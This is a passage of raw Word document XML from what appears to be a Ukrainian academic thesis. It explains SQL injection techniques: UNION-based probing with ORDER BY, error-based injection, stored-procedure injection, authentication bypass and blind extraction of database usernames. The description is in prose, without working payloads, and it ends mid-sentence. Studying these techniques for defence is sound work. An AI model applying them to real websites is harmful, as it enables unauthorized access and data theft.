        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Атакуючий перевіряє цю вразливість додаючи галочку до кінця “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">=” файлу. Якщо він повернеться з </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>помилкою, сайт швидше за все вразливий до UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7E266A" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Атакуючий продовжує використовувати ORDERBY для знаходження колонок, і в кінці, він використовує UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.[22]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9473CA" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00995DF9" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202B10EF" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="0088399F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc516752139"/>
      <w:bookmarkStart w:id="70" w:name="_Toc30433124"/>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.2 Виконання</w:t>
      </w:r>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Error Based </w:t>
      </w:r>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQL-ін’єкції</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="2F3560BD" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00995DF9" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCD0A2E" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Використовує повідомлення про помилки на рівні баз даних, що розкриваються додатком. Це повідомлення допомагає атакуючому створити зловмисний запит. Існує навіть ймовірність для створення автоматичних експлойтів, в залежності від помилки яку згенерував серв</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ер баз даних</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [19]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0C402F" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27070AC4" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="0088399F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc516752140"/>
      <w:bookmarkStart w:id="72" w:name="_Toc30433125"/>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6.3 Використання </w:t>
      </w:r>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Based</w:t>
      </w:r>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-ін’єкцій: використовуючи збережені процедури</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="5434C3D0" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00995DF9" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0748EEC3" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Деякі розробники використовують збережені процедури на задньому плані веб додатків для підтримки їх функціональності. Зберігання процедури є частиною SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">інструкції розробленої для виконання конкретних завдань. Розробники можуть написати статичну SQL інструкцію в середині збереженої процедури для підтримки функціональності додатку. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDFBF5" w14:textId="1F445709" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="008B0B5B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Якщо розробники використовують динамічну SQL інструкцію в збереженій процедурі, і якщо додаток використовує введення до динамічного SQL, тоді додаток може бути вразливим до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атака на збережені процедури може бути можливою якщо додаток не правильно фільтрує вхідні дані перед виконанням в збереженій процедурі. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB7C34B" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00995DF9" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CBCD32" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00AB53FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc516752141"/>
      <w:bookmarkStart w:id="74" w:name="_Toc30433126"/>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.4 Обхід автентифікації веб сайту використовуючи SQL-ін’єкцію</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="5C8BAC70" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00995DF9" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75632425" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Обхід автентифікації на веб сайті є основною і поширеною зловмисною активністю, що атакуючий може виконавши SQL ін’єкцію. Це найпростіший шлях для експлуатації будь яких вразливостей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в додатку. Атакуючий може пройти етап автентифікації додатку шляхом ін’єкції зловмисного коду на будь-який обліковий запису користувача, без уведення ім’я користувача і пароля. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E8903" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Атакуючий уводить зловмисний SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>код в строку веб сайту для обходу процесу автентифікації.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B35BE" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0599AB65" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00AB53FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc516752142"/>
      <w:bookmarkStart w:id="76" w:name="_Toc30433127"/>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00103F8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-ін’єкція</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Extract Database User</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="7350EE59" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00781B17" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D4B011" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Використовуючи </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL-ін’єкцію, атакуючий може отримати з бази даних ім’я користувача. Атакуючий може перевіряти сервер бази даних з </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> запитаннями для витягнення інформації. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347326A9" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В спробах вилучити ім’я користувачів з бази даних використовуючи </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ін’єкцію, атакуючий спочатку спробує визначити число символів в базі даних з ім’ям користувачів. Атакуючий хто успішно вивчив число символів в імені користувача тоді намагається знайти кожен символ в імені. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409EFADD" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Для знаходження першої букви імені користувача за допомогою бінарного пошуку, він приймає сім запитів і для восьми символів ім'я, він приймає 56 запитів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0AB61F" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
